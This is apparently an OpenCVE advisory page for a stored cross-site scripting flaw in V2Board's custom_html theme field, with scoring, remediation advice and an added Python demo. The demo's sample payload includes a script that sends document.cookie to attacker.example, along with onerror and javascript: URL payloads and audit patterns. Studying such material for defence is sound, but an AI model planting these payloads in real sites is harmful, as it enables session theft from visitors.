Description
Cross-Site Scripting (XSS) in V2Board thru 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing.
Published: 2026-05-01
Score: 6.9 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability affects V2Board versions through 1.7.4: the custom_html value stored in the theme configuration is emitted by public/theme/v2board/dashboard.blade.php with Blade's unescaped output directive ({!! ... !!}) instead of the escaped form ({{ ... }}), so whatever an administrator stores is written into the page verbatim. An administrator (or anyone holding administrator credentials) can therefore write arbitrary HTML and JavaScript into the field via the saveThemeConfig API, and because the dashboard is served to every authenticated user, each visitor's browser executes the payload in the site's origin. From there the script can read non-HttpOnly session cookies, act on the victim's behalf with the victim's session, or rewrite the page into a credential-phishing form. This is stored Cross-Site Scripting, CWE-79 (improper neutralisation of input during web page generation), with the defect at the output stage rather than at input validation.

Affected Systems

V2Board 1.7.4 and all earlier versions are affected. The unescaped output is in the bundled v2board theme template (public/theme/v2board/dashboard.blade.php), so any installation serving that theme renders the stored custom_html value as raw markup; the value itself is written through the saveThemeConfig API, which is the injection point.

Risk and Exploitability

The CVSS 3.1 base score of 6.9 (vector CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N) places the issue at Medium severity, not High: it is network-reachable with low attack complexity, but it requires high privileges (PR:H, an authenticated administrator stores the payload) and user interaction (UI:R, a victim has to load the dashboard). Scope is changed (S:C) because the payload, although planted through the admin API, executes in every visitor's browser, which is why confidentiality impact is rated High. No EPSS score is available, the CVE is not in the CISA KEV catalog, and the SSVC assessment records Exploitation: none and Automatable: no. The practical risk is therefore governed by who can reach the administrator role: once a single admin account is compromised, phished, or simply misused by an insider, the stored payload persists and compromises every user who opens the dashboard until the stored value is removed.

Generated by OpenCVE AI on May 2, 2026 at 08:00 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to a vendor release that renders custom_html with Blade's escaped output ({{ ... }}) or passes it through an allowlist HTML sanitizer; no fixed version is listed at the time of writing, so track the vendor's releases. Note that plain escaping neutralises the feature's HTML entirely, so if the site relies on custom_html for markup, an allowlist sanitizer (script tags, event-handler attributes and javascript: URLs stripped) is the option that preserves it.
  • If an upgrade is not possible, patch public/theme/v2board/dashboard.blade.php locally so the value is escaped or sanitized before output, or restrict the ability to call saveThemeConfig to the smallest set of trusted administrators and log every change to the theme configuration.
  • Audit the currently stored custom_html value for script tags, inline event handlers (onerror, onload, ...) and javascript: URLs, and remove anything unexpected before or alongside the upgrade. If a malicious payload is found, assume session cookies may already have been exfiltrated and invalidate active sessions.

Generated by OpenCVE AI on May 2, 2026 at 08:00 UTC.
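The following is an added example, not V2Board's code and not part of this advisory, illustrating both the rendering difference the description relies on and the audit step recommended above. It assumes a constructed custom_html payload (labelled in the code) and models Blade's escaped output as Laravel's e() helper, which calls htmlspecialchars with ENT_QUOTES; the unescaped directive passes the string through unchanged. The audit patterns are a pragmatic starting list, not an exhaustive sanitizer.

```python
"""Added example (not V2Board code): Blade escaped vs. unescaped output on a
stored custom_html value, plus an audit pass over that value.

Assumptions, labelled: SAMPLE_CUSTOM_HTML is constructed for this example;
blade_escaped() mirrors Laravel's e() helper, i.e. htmlspecialchars with
ENT_QUOTES (ENT_SUBSTITUTE's invalid-UTF-8 replacement is not modelled, since
Python strings are already valid Unicode).
"""
import re

# Constructed sample of what an administrator could store via saveThemeConfig.
SAMPLE_CUSTOM_HTML = (
    '<p>Welcome</p>'
    '<script>fetch("https://attacker.example/c?" + document.cookie)</script>'
    '<img src=x onerror="alert(1)">'
    '<a href="javascript:alert(2)">help</a>'
)

# Character map of PHP htmlspecialchars() with ENT_QUOTES.
_PHP_ENT_QUOTES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#039;",
}


def blade_unescaped(value: str) -> str:
    """Equivalent of {!! $value !!}: the stored string is emitted verbatim."""
    return value


def blade_escaped(value: str) -> str:
    """Equivalent of {{ $value }}: Laravel e() -> htmlspecialchars(ENT_QUOTES).

    Each character is looked up once, so existing entities are not double-encoded
    differently from PHP's default ($doubleEncode = true) behaviour.
    """
    return "".join(_PHP_ENT_QUOTES.get(ch, ch) for ch in value)


# Active-content patterns an auditor would look for in stored custom_html.
_ACTIVE_CONTENT = [
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("inline event handler", re.compile(r"\son[a-z]+\s*=", re.I)),
    ("javascript: URL", re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I)),
    ("iframe/object/embed", re.compile(r"<\s*(?:iframe|object|embed)\b", re.I)),
]


def audit_custom_html(value: str) -> list[str]:
    """Return the kinds of active content found in a stored custom_html value."""
    return [name for name, pattern in _ACTIVE_CONTENT if pattern.search(value)]


def contains_active_html(rendered: str) -> bool:
    """True if the rendered page still contains a live <script ...> element."""
    return bool(re.search(r"<\s*script\b", rendered, re.I))


if __name__ == "__main__":
    for directive, render in (("{!! !!}", blade_unescaped), ("{{ }}", blade_escaped)):
        out = render(SAMPLE_CUSTOM_HTML)
        print(f"{directive}: live script in page: {contains_active_html(out)}")
    print("audit findings:", audit_custom_html(SAMPLE_CUSTOM_HTML))
```

Running it shows the unescaped path leaving a live script element in the page while the escaped path reduces the same value to inert text, and the audit pass lists the three active constructs present in the sample. Against a real installation, feed audit_custom_html() the value read from the theme configuration store rather than the constructed sample.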

Advisories

No advisories yet.

History

Sat, 02 May 2026 08:30:00 +0000

Type: Title
Values added: Cross‑Site Scripting via Unescaped Theme Configuration in V2Board 1.7.4

Fri, 01 May 2026 21:15:00 +0000

Type: First Time appeared
Values added: V2board; V2board v2board
Type: Vendors & Products
Values added: V2board; V2board v2board

Fri, 01 May 2026 20:15:00 +0000

Type: Weaknesses
Values added: CWE-79
Type: Metrics
Values added: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 01 May 2026 15:30:00 +0000

Type: Description
Values added: Cross-Site Scripting (XSS) in V2Board thru 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing.
Type: References
Type: Metrics
Values added: cvssV3_1 {'score': 6.9, 'vector': 'CVSS:3.1/AC:L/AV:N/A:N/C:H/I:L/PR:H/S:C/UI:R'}


MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-05-01T19:46:08.026Z

Reserved: 2026-04-06T00:00:00.000Z

Link: CVE-2026-37503

Vulnrichment

Updated: 2026-05-01T19:40:20.702Z

NVD

Status : Received

Published: 2026-05-01T16:16:30.490

Modified: 2026-05-01T20:16:21.897

Link: CVE-2026-37503

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-02T08:15:16Z

Weaknesses